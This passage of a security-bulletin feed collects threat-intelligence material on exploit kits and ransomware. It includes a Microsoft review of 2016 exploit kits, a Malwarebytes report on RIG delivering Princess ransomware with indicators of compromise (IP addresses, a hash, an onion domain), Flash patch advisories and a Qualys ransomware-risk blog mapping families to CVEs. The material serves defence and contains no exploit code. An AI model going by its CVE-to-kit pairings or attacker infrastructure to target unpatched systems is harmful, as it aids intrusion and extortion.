malware families associated with exploit kits**\n\n**Malware family** | **Related exploit kit family** \n---|--- \n[Backdoor:Win32/Bedep](<https://www.microsoft.com/security/portal/threat/encyclopedia/Entry.aspx?Name=Backdoor:Win32/Bedep>) | Axpergle (Angler) \n[Backdoor:Win64/Bedep](<https://www.microsoft.com/security/portal/threat/encyclopedia/Entry.aspx?Name=Backdoor:Win32/Bedep>) | Axpergle (Angler) \n[Ransom:Win32/Cerber](<https://www.microsoft.com/security/portal/threat/encyclopedia/Entry.aspx?Name=Ransom:Win32/Cerber>) | Meadgive (RIG) \n[Ransom:Win32/Locky](<https://www.microsoft.com/security/portal/threat/encyclopedia/Entry.aspx?Name=Ransom:Win32/Locky>) | Neutrino \n[Trojan:Win32/Derbit](<https://www.microsoft.com/security/portal/threat/encyclopedia/Entry.aspx?Name=Trojan:Win32/Derbit.A>) | SundownEK \n \n## Integrating exploits at a slower rate\n\nWhile exploit kits rely on exploits for patched vulnerabilities, they also continually update their arsenal with newer exploits in the hope of casting bigger nets. This also allows them to take advantage of the window of opportunity between the release of a security fix and the time it is actually applied by users. Notably, the rate with which exploit kits integrate exploits for newly disclosed vulnerabilities is lower than in previous years.\n\nOf the major exploits used by kits in 2016, one is relatively old\u2014an exploit for a Microsoft Internet Explorer bug that was disclosed and patched back in 2014 (CVE-2014-6332). Four major kits use an exploit for the Adobe Flash vulnerability CVE-2015-8651, which was patched back in 2015.\n\nThree exploits disclosed in 2016 were seen in exploit kits, showing that operators still attempt continually improve their tools. One of these is a zero-day exploit for Adobe Flash (CVE-2016-1019) used by Pangimop at least five days before it was patched. However, this particular zero-day is a \u201cdegraded\u201d exploit, which means that it worked only on older versions of Adobe Flash. The exploit did not affect the latest version of the software at the time, because Adobe previously introduced stronger exploit mitigation, which Microsoft helped build.\n\n**Major exploits used by exploit kits**\n\n**Exploit** | **Targeted Product ** | ** Exploit kit** | **Date patched** | **Date first seen in exploit kit** \n---|---|---|---|--- \nCVE-2014-6332 | Microsoft Internet Explorer (OLE) | NeutrinoEK | November 11, 2014 ([MS14-064](<https://technet.microsoft.com/en-us/library/security/ms14-064.aspx?f=255&MSPPError=-2147217396>)) | November 19, 2014 \nCVE-2015-8651 | Adobe Flash | Axpergle, NeutrinoEK, Meadgive, SteganoEK | December 28, 2015 ([APSB16-01](<https://helpx.adobe.com/security/products/flash-player/apsb16-01.html>)_)_ | December 28, 2015 \nCVE-2016-0189 | Microsoft Internet Explorer | NeutrinoEK | May 10, 2016 ([MS16-051](<https://technet.microsoft.com/en-us/library/security/ms16-051.aspx>)) | July 14, 2016 \nCVE-2016-1019 | Adobe Flash | Pangimop, NeutrinoEK | April 7, 2016 ([ASPB16-10](<https://helpx.adobe.com/security/products/flash-player/apsb16-10.html>)_)_ | April 2, 2016 (zero-day) \nCVE-2016-4117 | Adobe Flash | NeutrinoEK | May 12, 2016 ([ASPB16-15](<https://helpx.adobe.com/security/products/flash-player/apsb16-15.html>)_)_ | May 21, 2016 \n \nWe did not see exploit kits targeting Microsoft\u2019s newest and most secure browser, Microsoft Edge, in 2016. Only a few days into the new year, however, SundownEK was updated to include an exploit for an old vulnerability that was patched a couple of months prior. Microsoft Edge applies patches automatically by default, rendering the exploit ineffective.\n\nIt was also SundownEK that integrated steganography in late 2016. Steganography, a technique that is not new but getting more popular with cybercriminals, hides information like malicious code or encryption keys in images.\n\nInstead of loading the exploit directly from a landing page, SundownEK downloads an image that contains the exploit code. This method is employed to avoid detection.\n\n## Stopping exploit kits with updates and a secure platform\n\nWhile we see a willingness among cybercriminals to switch from exploit kits to spam and other vectors, there is a clear desire to continue using kits. We see cybercriminals switch from one kit to another, replacing kits as they become unavailable. Meanwhile, exploit kit authors continue to keep their wares attractive to cybercriminals by incorporating new exploits.\n\nKeeping browsers and other software up-to-date can counter the impact of exploit kits. [Microsoft Edge](<https://technet.microsoft.com/itpro/microsoft-edge/index>) is a secure browser that gets updated automatically by default. It also has multiple built-in [defenses](<https://microsoft.sharepoint.com/teams/osg_core_dcp/cpub/partner/antimalware/Shared Documents/8438038_RS2_Blogs/2016 in Review series/-%09https:/www.blackhat.com/docs/us-16/materials/us-16-Weston-Windows-10-Mitigation-Improvements.pdf>) against exploit kits that attempt to download and install malware. These defenses include on-by-default sandboxing and state of the art exploit mitigation technologies. Additionally, [Microsoft SmartScreen](<https://blogs.windows.com/msedgedev/2015/12/16/smartscreen-drive-by-improvements/#3FYqD02TC1A6VsaL.97>), which is used in both Microsoft Edge and Internet Explorer 11, blocks malicious pages, such as landing pages used by exploit kits.\n\nAt the same time, running a secure platform like Windows 10 enables users to benefit from advanced security features.\n\n[Windows Defender](<https://technet.microsoft.com/en-us/itpro/windows/keep-secure/windows-defender-in-windows-10>) uses IExtensionValidation (IEV) in Microsoft Internet Explorer 11 to detect exploits used by exploit kits. Windows Defender can also detect the malware that exploit kits attempt to download and execute.\n\nWindows 10 Enterprise includes [Device Guard](<https://technet.microsoft.com/itpro/windows/keep-secure/device-guard-deployment-guide>), which can lock down devices and provide kernel-level virtualization based security.\n\n[Windows Defender Advanced Threat Protection](<http://www.microsoft.com/en-us/WindowsForBusiness/windows-atp>) alerts security operation teams about suspicious activities, including exploitation of vulnerabilities and the presence of malware, allowing them to detect, investigate, and respond to attacks.\n\n \n\n_MMPC_\n\n \n\n## Related blog entries:\n\n * [World Backup Day is as good as any to back up your data](<https://blogs.technet.microsoft.com/mmpc/2017/03/28/world-backup-day-is-as-good-as-any-to-back-up-your-data/>)\n * [Ransomware: a declining nuisance or an evolving menace?](<https://blogs.technet.microsoft.com/mmpc/2017/02/14/ransomware-2016-threat-landscape-review/>)\n * [Averting ransomware epidemics in corporate networks with Windows Defender ATP](<https://blogs.technet.microsoft.com/mmpc/2017/01/30/averting-ransomware-epidemics-in-corporate-networks-with-windows-defender-atp/>)", "edition": 2, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2017-01-23T22:37:34", "title": "Exploit kits remain a cybercrime staple against outdated software \u2013 2016 threat landscape review series", "type": "mmpc", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": true, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-1019", "CVE-2014-6332", "CVE-2016-0189", "CVE-2016-4117", "CVE-2015-8651"], "modified": "2017-01-23T22:37:34", "href": "https://blogs.technet.microsoft.com/mmpc/2017/01/23/exploit-kits-remain-a-cybercrime-staple-against-outdated-software-2016-threat-landscape-review-series/", "id": "MMPC:A8911A071FAE866BC15F59CA0B325D45", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "malwarebytes": [{"lastseen": "2017-08-31T23:10:36", "description": "We have identified a new drive-by download campaign that distributes the Princess ransomware (AKA PrincessLocker), leveraging compromised websites and the RIG exploit kit. This is somewhat of a change for those tracking malvertising campaigns and their payloads.\n\nWe had [analyzed ](<https://blog.malwarebytes.com/threat-analysis/2016/11/princess-ransomware/>)the PrincessLocker ransomware last November and pointed out that despite similarities with Cerber's onion page, the actual code was much different. A [new payment page](<https://twitter.com/campuscodi/status/900434464341463043>) seemed to have been seen in underground forums and is now being used with attacks in the wild.\n\n### From hacked site to RIG EK\n\nWe are not so accustomed to witnessing compromised websites pushing exploit kits these days. Indeed, some campaigns have been replaced with tech support scams instead and overall most drive-by activity comes from legitimate publishers and malvertising.\n\nYet, here we observed an iframe injection which redirected from the hacked site to a temporary gate distinct from the well-known \"Seamless gate\" which has been dropping copious amounts of the Ramnit Trojan.\n\n\n\nThe ultimate call to the RIG exploit kit landing page is done via a standard 302 redirect leading to one of several Internet Explorer ([CVE-2013-2551](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-2551>), [CVE-2014-6332](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-6332>), [CVE-2015-2419](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-2419>), [CVE-2016-0189](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-0189>)) or Flash Player ([CVE-2015-8651](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-8651>)) vulnerabilities.\n\n### Princess ransomware\n\nOnce the exploitation phase is successful, RIG downloads and runs the Princess Ransomware. The infected user will notice that their files are encrypted and display a new extension. The ransom note is called **__USE_TO_REPAIR_[a-zA-Z0-9].html_** where [a-zA-Z0-9] is a random identifier.\n\n[](<https://blog.malwarebytes.com/wp-content/uploads/2017/08/ransom.png> \"\" )\n\nThe payment page can be accessed via several provided links including a '_.onion_' one. Attackers are asking for 0.0770 BTC, which is about $367 at the time of writing.\n\n[](<https://blog.malwarebytes.com/wp-content/uploads/2017/08/BTC.png> \"\" )\n\n### Down but still kicking\n\nThe exploit kit landscape is not what it was a year ago, but we may be remiss to disregard drive-by download attacks completely. Malvertising is still thriving and we are noticing increased activity and changes with existing threat actors and newcomers.\n\nWe will update this post with additional information about Princess Locker if there is anything noteworthy to add.\n\n### Indicators of compromise\n\nRIG EK gate:\n \n \n 185.198.164.152\n\nRIG EK IP address:\n \n \n 188.225.84.28\n\nPrincessLocker binary:\n \n \n c61f4c072bb1e3c6281a9799c1a3902f35dba652756fe96a97e60d0097a3f9b7\n\nPrincessLocker payment page:\n \n \n royall6qpvndxlsj[.]onion\n\nThe post [RIG exploit kit distributes Princess ransomware](<https://blog.malwarebytes.com/cybercrime/2017/08/rig-exploit-kit-distributes-princess-ransomware/>) appeared first on [Malwarebytes Labs](<https://blog.malwarebytes.com>).", "edition": 2, "cvss3": {}, "published": "2017-08-31T20:04:32", "title": "RIG exploit kit distributes Princess ransomware", "type": "malwarebytes", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2013-2551", "CVE-2014-6332", "CVE-2015-2419", "CVE-2015-8651", "CVE-2016-0189"], "modified": "2017-08-31T20:04:32", "href": "https://blog.malwarebytes.com/cybercrime/2017/08/rig-exploit-kit-distributes-princess-ransomware/", "id": "MALWAREBYTES:97E85AF6235DC2739548158FE583610A", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "gentoo": [{"lastseen": "2022-01-17T19:06:33", "description": "### Background\n\nThe Adobe Flash Player is a renderer for the SWF file format, which is commonly used to provide interactive websites. \n\n### Description\n\nMultiple vulnerabilities have been discovered in Adobe Flash Player. Please review the CVE identifiers referenced below for details. \n\n### Impact\n\nA remote attacker could possibly execute arbitrary code with the privileges of the process, cause a Denial of Service condition, obtain sensitive information, or bypass security restrictions. \n\n### Workaround\n\nThere is no known workaround at this time.\n\n### Resolution\n\nAll Adobe Flash Player users should upgrade to the latest version:\n \n \n # emerge --sync\n # emerge --ask --oneshot --verbose \"www-plugins/adobe-flash-11.2.202.626\"", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2016-06-18T00:00:00", "type": "gentoo", "title": "Adobe Flash Player: Multiple vulnerabilities", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": true, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-1019", "CVE-2016-4117", "CVE-2016-4120", "CVE-2016-4121", "CVE-2016-4160", "CVE-2016-4161", "CVE-2016-4162", "CVE-2016-4163", "CVE-2016-4171"], "modified": "2016-06-18T00:00:00", "id": "GLSA-201606-08", "href": "https://security.gentoo.org/glsa/201606-08", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "mscve": [{"lastseen": "2021-12-06T18:25:26", "description": "This security update addresses the following vulnerabilities, which are described in Adobe Security Bulletin [APSB16-10](<http://helpx.adobe.com/security/products/flash-player/apsb16-10.htm>):\n\nCVE-2016-1006, CVE-2016-1011, CVE-2016-1012, CVE-2016-1013, CVE-2016-1014, CVE-2016-1015, CVE-2016-1016, CVE-2016-1017, CVE-2016-1018, and CVE-2016-1019\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2016-04-12T07:00:00", "type": "mscve", "title": "April 2016 Adobe Flash Security Update", "bulletinFamily": "microsoft", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": true, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-1006", "CVE-2016-1011", "CVE-2016-1012", "CVE-2016-1013", "CVE-2016-1014", "CVE-2016-1015", "CVE-2016-1016", "CVE-2016-1017", "CVE-2016-1018", "CVE-2016-1019"], "modified": "2017-05-16T07:00:00", "id": "MS:ADV160001", "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/ADV160001", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "qualysblog": [{"lastseen": "2021-10-05T16:35:26", "description": "With most employees still working from remote locations, ransomware attacks have increased steadily since the early months of the Covid-19 pandemic. According to the FBI\u2019s 2020 Internet Crime Report 2400+ ransomware-related incidents in 2020 resulted in a loss of about 29 million dollars. These numbers are only getting worse and do not include damage from incidents not reported to the FBI.\n\nRansomware attacks affect various industries worldwide, and ransomware demands continue to increase. Some recent examples include:\n\n * [Conti Ransomware:](<https://us-cert.cisa.gov/ncas/alerts/aa21-265a>) Conti ransomware is spread using spear phishing campaigns through tailored emails that contain malicious attachments or malicious links and via stolen or weak Remote Desktop Protocol (RDP) credentials. \n * [Netfilm Ransomware](<https://blog.qualys.com/vulnerabilities-threat-research/2021/05/12/nefilim-ransomware>): Nefilim ransomware is distributed through exposed Remote Desktop Protocol (RDP) setups by brute-forcing them and using other known vulnerabilities for initial access, such as Citrix gateway devices.\n * [REvil Ransomware:](<https://blog.qualys.com/product-tech/2021/07/08/kaseya-revil-ransomware-attack-cve-2021-30116-automatically-discover-and-prioritize-using-qualys-vmdr>) REvil is a ransomware family that operates as ransomware-as-a-service (RaaS), has been linked to GOLD SOUTHFIELD, a financially motivated group, and was first identified in April 2019 according to MITRE.\n * [DarkSide Ransomware](<https://blog.qualys.com/vulnerabilities-threat-research/2021/06/09/darkside-ransomware>) : DarkSide ransomware performs brute force attacks and exploits known vulnerabilities in the remote desktop protocol (RDP) to gain initial access. DarkSide ransomware, first seen in August 2020 and updated as v2.0 in March 2021, is associated with the DarkSide group and now often operates as RaaS.\n * [Michigan State University (May 2020)](<https://www.zdnet.com/article/michigan-state-university-hit-by-ransomware-gang/>) - The MSU administrators were given a week to pay an undisclosed ransom demand to decrypt their files. In case MSU officials refuse to pay or choose to restore backups, the cybercriminals were prepared to leak documents stolen from the university's network on a special website the group is operating on the dark web.\n * [DearCry and Exchange vulnerabilities](<https://news.sophos.com/en-us/2021/03/15/dearcry-ransomware-attacks-exploit-exchange-server-vulnerabilities/>) - DearCry ransomware attacks exploited Microsoft Exchange Server vulnerabilities CVE-2021-26855 and CVE-2021-27065. These vulnerabilities were being widely exploited before patches were available. Forcing Microsoft to release out-of-band updates. \n * [Colonial Pipeline](<https://www.cnbc.com/2021/06/08/colonial-pipeline-ceo-testifies-on-first-hours-of-ransomware-attack.html>) - Colonial Pipeline was most likely target of ransomware attack due vulnerable, outdated version of Microsoft Exchange. Attackers potentially exploited these vulnerabilities, and as a result, Colonial Pipeline took its systems down to contain the threat, limiting gasoline supply to the east coast. \n\nAs seen above, industries ranging from education, manufacturing, electronics, research, health and more are impacted by ransomware.\n\nTo help organizations combat risks from ransomware, Qualys is introducing Ransomware Risk Assessment service. As outlined in [_our blog_](<https://blog.qualys.com/product-tech/2021/10/05/assess-risk-ransomware-attacks-qualys-research>), the Qualys Ransomware Risk Assessment & Remediation service leverages the security intelligence which is curated by Qualys Research experts to map ransomware families to specific vulnerabilities, misconfigurations, and vulnerable software. The Qualys Ransomware Risk Assessment service enables organizations to:\n\n * Get a unified view into critical ransomware exposures such as internet-facing vulnerabilities and misconfigurations, insecure remote desktop gateways (RDP), as well as detection of risky software in datacenter environment along with alerting for assets missing anti-malware solutions. \n * Accelerate remediation of Ransomware exposure~~s~~ with zero-touch patching by continuously patching ransomware-vulnerabilities as they are detected. The remediation plan also enables proactive patching for prioritized software to help you keep software up to date. \n\n#### **Ransomware Infection Vectors**\n\nAlthough cyber criminals use a variety of techniques to infect victims with ransomware, the most common means of infection are: \n\n * **Remote Desktop Protocol** (RDP) vulnerabilities: RDP allows individuals to see and control the system remotely. It is a very common practice in organizations as it provides easy access to systems remotely. Once cybercriminals have RDP access, they can deploy malicious software on the system, making it inaccessible to legitimate users unless the victim pays the demanded ransom. Shodan search shows currently open and potentially vulnerable RDP services on the internet, and you can buy RDP access for [as low as US$3](<https://www.bankinfosecurity.com/how-much-that-rdp-credential-in-window-a-10590>). \n\n\n\n * **Email phishing campaigns**: Email is a prevalent medium to get malware into the target environment. Cybercriminals use emails to send malicious links to deploy malware on recipients\u2019 machines. It allows cybercriminals to steal sensitive data without breaking through network security and is very common among cybercriminals. \n * **Software vulnerabilities**: Software vulnerabilities are even more prevalent than phishing. Client- and server-side vulnerabilities allow criminals to take advantage of security weaknesses in widely used software programs, gain control of victim systems, and deploy ransomware. Vulnerabilities in VPN systems such as Pulse Secure VPN and Fortinet are common targets as well.\n\n#### **Ransomware Attacks and Exact CVEs To Prioritize for Monitoring**\n\nAs mentioned above known vulnerabilities and weakness are one of the top infection vectors. \n\nQualys research team has performed extensive research on 36 prevalent ransomware families and have mapped them to 64 CVEs and the 247 QIDs that can detect them. The following is just a sample list of some of most widely used ransomware in the attacks along with the CVEs leveraged to infect systems. \n\n**Ransomware**| **Description**| **CVE (s)**| QID (s) \n---|---|---|--- \nConti | The Conti ransomware strain will not only encrypt important files but will also exfiltrate them to a location controlled by the attacker. This method of extortion-ware is used to force victims to pay the ransom in order to avoid the sensitive data from being leaked. Conti operators are known to use well-known hacking tools such as Mimikatz and Cobalt Strike leading up to the encryption of files | CVE-2020-1472, CVE-2021-34527, \nCVE-2017-0143, CVE-2017-0144, CVE-2017-0145 | 91680, \n91668, \n91785, \n91345, \n91360 \nTeslacrypt, PrincessLocker | TeslaCrypt ransomware was uploaded to VirusTotal in November 2014 but was more widely spread in early 2015 and continues to evolve. TeslaCrypt encrypts the files using AES-256 algorithm until the victim pays the ransom in either Bitcoin or Cash Cards. | CVE-2013-2551, CVE-2015-8651 | 168351, 168350, 124422, 168341, 168340, 100271, 124421 \nLocky, Cerber | Cerber ransomware is ransomware-as-a-service (RaaS), meaning an attacker can distribute the licensed copy of this ransomware over the internet and pay commissions to the developer. | CVE-2016-1019 | 256924, 256922, 177873, 176784, 296029, 296028, 170815, 170724, 170711, 170365, 256256, 170264, 236438, 170119, 256214, 170052, 276628, 236342, 157445, 169942, 169941, 169923, 276572, 169854, 169853, 176004, 196742, 196725, 370320, 276455, 175965, 168848, 168813, 168792, 168696, 168694, 168594, 100282, 124879, 124872 \nWannaCry, Badrabbit | The WannaCry ransomware \u2014 formally known as WanaCrypt0r 2.0 \u2014 spreads using an exploit called EternalBlue for a Windows OS vulnerability that Microsoft patched in March 2017. | CVE-2017-0145 | 91361, 91360, 91359, 91347, 91345 \nDearCRy, BlackKingdom | DearCry takes advantage of compromised Microsoft Exchange Servers with vulnerability CVE-2021-26855. When exploited, cybercriminals gain initial access to the Exchange Server and then install web shells. | CVE-2021-26855 | 50107, 50108 \n \n### Unified View of Critical Ransomware Risk Exposures\n\nIt is a daunting task to get a unified view of multiple critical ransomware exposures together such as internet-facing vulnerabilities, misconfigurations as well as unauthorized software. Qualys Ransomware Risk Assessment & remediation service dashboard enables security teams to see all the internet-facing assets that are exposed to ransomware related vulnerability or misconfiguration and take needed actions in the most impactful way. It also enables users to measure and track their effectiveness at addressing vulnerabilities or misconfigurations before they are used for ransomware attacks. \n\n\n\nIn addition, organizations should implement a good cyber hygiene program to scan vulnerabilities, discovery misconfigurations regularly with sufficient detection capabilities such as QIDs enabled, as well as an efficient automated process to deploy important security patches on targeted assets quickly with the scalability needed. \n\n### Qualys Ransomware Risk Assessment & Remediation Service\n\nQualys provides an all-in-one solution to discover, assess, prioritize, monitor, and patch critical vulnerabilities in real time and across your global hybrid-IT landscape. The following sections provide an overview of each of the critical components from Qualys product portfolio and how they can be uniquely valuable in the effort of combatting ransomware attacks. \n\n#### Detect your critical data assets & monitor security blind-spots with CyberSecurity Asset Management (CSAM) \n\nEnables organizations to automatically discover every asset in their environment, including unmanaged assets appearing on the network, inventory all hardware and software, and classify and tag critical assets. \n\n#### Discover, Inventory and Categorize assets \n\nIt is important to know your blind spots to protect against ransomware. Use CSAM to discover all assets, including the ones that are exposed to the internet as well as unknown/unmanaged assets that are connecting to your network. \n\nCSAM automatically organizes your assets by their functional category by analyzing their hardware and installed software. Extends your inventory by incorporating key business information from your CMDB, such as status, environment, ownership, support groups, and business criticality.\n\n\n\n#### Monitor & detect at-risk assets and applications - Assets missing Anti-virus, running unauthorized software \n\nCSAM enriches your asset inventory with in-context, relevant information to help you detect at-risk assets and applications. You can identify and set alerts for assets that are running unauthorized software or are not using anti-virus/endpoint security tools. \n\n * Unauthorized software should be removed to quickly reduce unnecessary attack vectors. With CSAM you can easily define rules to monitor unauthorized software installations. \n * Identify assets missing required security software, such as Antivirus and Endpoint Protection. \n * Identify EOL/EOS software, which can be used as ransomware attack vectors. End-of-Support software is one of the first things hackers look to exploit because they know publishers are no longer providing security updates and patches. \n\n#### Monitor & detect at-risk assets and applications - Assets missing Anti-virus, running unauthorized software \n\nCSAM enriches your asset inventory with in-context, relevant information to help you detect at-risk assets and applications. You can identify and set alerts for assets that are running unauthorized software or are not using anti-virus/endpoint security tools. \n\n * Unauthorized software should be removed to quickly reduce unnecessary attack vectors. With CSAM you can easily define rules to monitor unauthorized software installations. \n * Identify assets missing required security software, such as Antivirus and Endpoint Protection. \n * Identify EOL/EOS software, which can be used as ransomware attack vectors. End-of-Support software is one of the first things hackers look to exploit because they know publishers are no longer providing security updates and patches. \n\n\n\n### Continuous detection & prioritization for Ransomware-specific vulnerabilities with VMDR \n\nThe first step in managing vulnerabilities and reducing risk is identification of assets. [Qualys VMDR](<https://www.qualys.com/subscriptions/vmdr/>) makes it easy to identify systems with open ports. For example, hosts with Remote Desktop Protocol (RDP) enabled. \n\n_operatingSystem.category1:`Windows` and openPorts.port:`3389`_ \n\n\n\nOnce the hosts with RDP are identified, they can be grouped together with a \u2018dynamic tag\u2019, let us say \u2013 \u201cRDP Asset\u201d. This helps in automatically grouping existing hosts with this vulnerability as well as any new hosts that spin up in your environment. Tagging makes these grouped assets available for querying, reporting and management throughout the [Qualys Cloud Platform](<https://www.qualys.com/cloud-platform/>). \n\n### **Discover and Prioritize Ransomware Vulnerabilities** \n\nNow that hosts with \u201cRDP\u201d are identified, you want to detect which of these assets have flagged this vulnerability. VMDR automatically detects new vulnerabilities like Windows RDP, Exchange Server vulnerability and more based on the always updated Knowledgebase. \n\nYou can see all your impacted hosts for this vulnerability tagged with the \u2018Ransomware asset tag in the vulnerabilities view by using this QQL query: \n\n**vulnerabilities.vulnerability.threatIntel.ransomware: true** \n\nOr \n\n**vulnerabilities.vulnerability.ransomware.name:WannaCry** \n\nThis will return a list of all impacted hosts. \n\n\n\nUsing VMDR prioritization, the ransomware vulnerabilities can be easily prioritized using \u201cRansomware\u201d Real-Time Threat Intelligence: \n\n\n\nVMDR also enables you to stay on top of these threats proactively via the \u2018live threat feed\u2019 provided for threat prioritization. With \u2018live feed\u2019 updated for all emerging high and medium risks, you can clearly see the impacted hosts against threats. \n\nSimply click on the impacted assets for the \u201cRansomware\u201d feeds to see the vulnerability and impacted host details.\n\n\n\nQualys provides the ability for a Unified Dashboard approach with the key metrics across all Apps providing key metrics against your overall security posture against Ransomware Related data points such as: \n\n * Ransomware Related vulnerabilities \n * Unauthorized Software \n * Misconfigurations leveraged by ransomware \n * Internet Facing Hosts with RDP vulnerabilities and many more\u2026 \n\nThe Unified Dashboard enabled you to track your ransomware exposure, against impacted hosts, their status, and overall management in real-time. \n\n### **Discover and Mitigate Ransomware Misconfigurations such as SMB, Insecure RDP** \n \n\n[Qualys Policy Compliance](<https://www.qualys.com/apps/policy-compliance/>) provides the Ransomware Best Practices policy which contains the critical controls mapped to MITRE ATT&CK mitigations and tactics recommended by [CISA](<https://us-cert.cisa.gov/ncas/alerts/aa21-131a>) and best practices published by [Fireye Mandiant](<https://www.fireeye.com/content/dam/fireeye-www/current-threats/pdfs/wp-ransomware-protection-and-containment-strategies.pdf>). These mitigations are effective across top techniques and can potentially reduce the risk of ransomware attacks. These critical controls can limit attacker initial access and the lateral movement around the network. \n\nAs organizations look to prevent the attacks from happening in the first place, security teams should focus on implementing these controls proactively and effectively across all assets to reduce the risk. By automating the configuration assessment with Qualys Policy Compliance, organizations can ensure golden images to conform to security baselines and prevent images from ever having misconfigurations and identify configurations drifts to prevent security risks. \n\n#### **Mitigation or Important Precautionary Measures and Controls ** \n\nThe Qualys internal research team has identified top five security measures and configuration controls; a security team should consider for their organization to prevent business interruption from a ransomware attack. Research is based on best practices published by FireEye (Mandiant), Cybersecurity and Infrastructure Security Agency (CISA), and CISA MS-ISAC. Policies/technical controls should be implemented. These configuration checks go beyond typical CIS or DISA benchmarks. \n \n\n 1. Enforce Password Policies. e.g. \n * Minimum password age should be set, \n * Password complexity requirements should be enabled. \n * Enforce password history restrictions. \n 2. Employ best practices for use of Remote Desktop protocol e. g \n * Disable RDP services if not necessary. \n * Close unused RDP ports, Audit the network for systems using RDP. \n * Apply Multifactor authentication. \n * Disable or block Server Message Block (SMB) protocol and remove or disable outdated versions of SMB. \n * RDP account controls \n 3. Employ Network security and Firewalls e.g. \n * Enforce firewall policy rules. \n * Deny all rule and allow only required networks, access. \n * Common ports and protocols that should be blocked. \n 4. Enforce Account Use Policies. E.g. \n * Apply account lockouts after a specified number of attempts. \n * Admin approval requirements. \n * Apply UAC restrictions on network logons etc. \n * Least privileges are assigned to users. \n 5. Keep Software Updated \n * Ensure automatic updates are enabled. \n * Patches, software\u2019s should be installed and updated in a timely manner which includes operating systems, applications, etc. \n\n\n\nQualys research has mapped misconfigurations to the relevant MITRE ATTACK techniques (summarized in the table below) to define 237 configuration checks across five security areas such as RDP hardening, user controls, network, protocol and port configuration security, share and password policies and software update policies, essentially helping organizations proactively prevent 20 attack techniques leveraged in ransomware attacks. \n \n\n**TTP Map** \n\nInitial Access (TA0001)| Credential Access (TA0006)| Privilege Escalation (TA0004)| Execution (TA0002)| Defense Evasion (TA0005)| Lateral Movement (TA0008)| Command and Control (TA0011)| Impact (TA0040) \n---|---|---|---|---|---|---|--- \nValid Accounts (T1078)| Brute Force(T1110)| Abuse Elevation Control Mechanism (T1548)| Scheduled Task / Job (T1053)| Impair Defenses (T1562)| Remote Services (T1021)| Non-Application Layer Protocol (T1095)| Data Manipulation: Transmitted Data Manipulation 